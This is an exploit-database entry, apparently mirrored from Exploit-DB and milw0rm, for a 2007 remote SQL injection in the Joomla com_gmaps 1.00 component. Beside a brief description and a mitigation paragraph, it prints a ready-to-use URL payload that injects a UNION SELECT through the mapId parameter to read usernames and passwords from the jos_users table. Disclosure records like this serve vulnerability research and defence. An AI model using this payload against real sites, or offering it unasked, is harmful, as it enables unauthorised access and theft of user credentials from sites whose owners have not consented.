header-logo
Suggest Exploit
vendor:
com_gmaps
by:
milw0rm.com
N/A
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: com_gmaps
Affected Version From: 1.00
Affected Version To: 1.00
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

joomla com_gmaps 1.00 Remote SQl Injection

The exploit allows an attacker to execute unauthorized SQL queries in the Joomla com_gmaps 1.00 component. By injecting malicious code in the mapId parameter, the attacker can retrieve sensitive information such as usernames and passwords from the jos_users table.

Mitigation:

Upgrade to a patched version of the component or disable the vulnerable feature. Use input validation and parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

joomla com_gmaps 1.00 Remote SQl Injection
 
Found: Cyber-Security
 
Exploit:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

# milw0rm.com [2007-07-31]

Navigation

Suggest Exploit

Services By CQR